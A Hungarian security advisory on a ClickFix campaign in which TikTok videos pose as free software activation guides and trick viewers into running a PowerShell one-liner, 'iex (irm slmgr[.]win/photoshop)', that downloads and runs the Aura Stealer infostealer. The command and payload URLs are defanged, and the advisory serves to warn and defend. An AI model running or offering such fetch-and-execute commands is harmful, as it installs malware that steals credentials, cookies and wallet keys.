A kiberbűnözők továbbra is TikTok-videókat használnak információlopó programok terjesztésére ClickFix típusú támadások kihasználásával. A támadók olyan TikTok-videókat készítenek, amelyek népszerű szoftverek, például a Windows, a Spotify vagy a Netflix „ingyenes aktiválási útmutatóinak” álcázzák magukat. Ezek a videók valójában kártékony kódokat juttatnak a felhasználók gépeire, amelyek célja bizalmas személyes adatok, például bejelentkezési adatok, sütik vagy kriptotárca kulcsok megszerzése.
A kampányt Xavier Mertens, az Internet Storm Center (ISC) elemzője azonosította. Az általa megfigyelt videókban a következő programok hamis aktiválási módja szerepelt: Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, Discord Nitro.
Ezek a videók az úgynevezett ClickFix támadási technikát alkalmazzák, amely társadalmi manipulációra épül. A felhasználót arra ösztönzik, hogy egy látszólag ártalmatlan, „javítást” tartalmazó parancsot futtasson le, valójában azonban egy kártékony PowerShell-parancsot vagy scriptet hajt végre, amely megfertőzi a rendszerét.
A videókban jellemzően egy rövid, egyetlen soros parancsot mutatnak be, mint például az „iex (irm slmgr[.]win/photoshop)”. A név az adott hamisított programtól függően változik, például egy Windows-aktivátor videóban a „photoshop” elnevezés „windows”-ra módosul.
A parancs végrehajtásakor a PowerShell kapcsolódik a slmgr[.]win domainhez, ahonnan egy újabb PowerShell-scriptet tölt le és futtat. Ez a script két további futtatható fájlt tölt le a Cloudflare Pages szolgáltatásáról. Az első az „– updater[.]exe”, amelyet a https://file-epq[.]pages[.]dev/updater[.]exe címről tölt le. Ez az Aura Stealer nevű információlopó kártevő egyik változata.
Az Aura Stealer különböző böngészőkből és alkalmazásokból gyűjti össze a mentett hitelesítési adatokat, sütiket, kriptovaluta-tárcákhoz tartozó kulcsokat, valamint egyéb hozzáférési információkat, majd ezeket feltölti a támadók szervereire, teljes hozzáférést biztosítva számukra az áldozat fiókjaihoz.
Mertens szerint a script egy második komponenst is letölt, source[.]exe néven. Ez a fájl a .NET környezet beépített Visual C# Compilerét (csc[.]exe) használja saját kód létrehozására, amelyet aztán memóriába injektál és onnan futtat. Ezen payload valódi célja azonban még nem ismert.
Azok a felhasználók, akik lefuttatták ezen parancsokat, tekintsék kompromittáltnak minden hitelesítő adatukat, és jelszavaikat haladéktalanul változtassák meg a használt szolgáltatásokban. Az NBSZ NKI egyértelműen azt javasolja: semmilyen, az internetről másolt parancssort vagy kódrészletet ne futtasson, legyen az Windows PowerShell, Parancssor, macOS Terminal vagy Linux shell. Ugyancsak kockázatot jelentenek a fájlkezelő címsorába illesztett parancsok.
